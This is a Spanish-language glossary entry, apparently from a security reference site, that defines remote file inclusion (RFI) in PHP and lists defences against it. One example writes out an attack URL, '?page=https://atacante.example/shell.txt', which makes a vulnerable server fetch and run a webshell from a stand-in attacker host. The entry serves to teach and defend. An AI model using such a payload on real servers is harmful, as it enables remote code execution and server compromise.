Inclusión remota de archivos (RFI)
¿Qué es Inclusión remota de archivos (RFI)?
Inclusión remota de archivos (RFI)Vulnerabilidad que permite al atacante forzar al servidor a descargar y ejecutar código desde una URL remota que él elige.
La inclusión remota de archivos (RFI) ocurre cuando una aplicación pasa una entrada del usuario a una función include o require y el runtime admite URLs remotas (por ejemplo PHP con allow_url_include activado). El servidor descarga el archivo desde un host controlado por el atacante y lo ejecuta dentro del proceso de la aplicación, lo que produce una ejecución remota de código inmediata. La RFI suele ser más grave que la LFI porque no requiere acceso de escritura previo en el servidor. Las defensas son deshabilitar la inclusión de URLs remotas en el runtime, usar listas blancas estrictas de nombres de módulos estáticos, no incluir nunca rutas derivadas de la entrada del usuario y segmentar los servidores con un filtrado de salida riguroso.
● Ejemplos
- 01
Una aplicación PHP que llama a include($_GET['page']) donde ?page=https://atacante.example/shell.txt carga y ejecuta una webshell.
- 02
Un plugin de CMS obsoleto que carga una página de administración desde un parámetro URL permite ejecutar un archivo PHP alojado por el atacante.
● Preguntas frecuentes
¿Qué es Inclusión remota de archivos (RFI)?
Vulnerabilidad que permite al atacante forzar al servidor a descargar y ejecutar código desde una URL remota que él elige. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa Inclusión remota de archivos (RFI)?
Vulnerabilidad que permite al atacante forzar al servidor a descargar y ejecutar código desde una URL remota que él elige.
¿Cómo defenderse de Inclusión remota de archivos (RFI)?
Las defensas contra Inclusión remota de archivos (RFI) combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para Inclusión remota de archivos (RFI)?
Nombres alternativos comunes: RFI.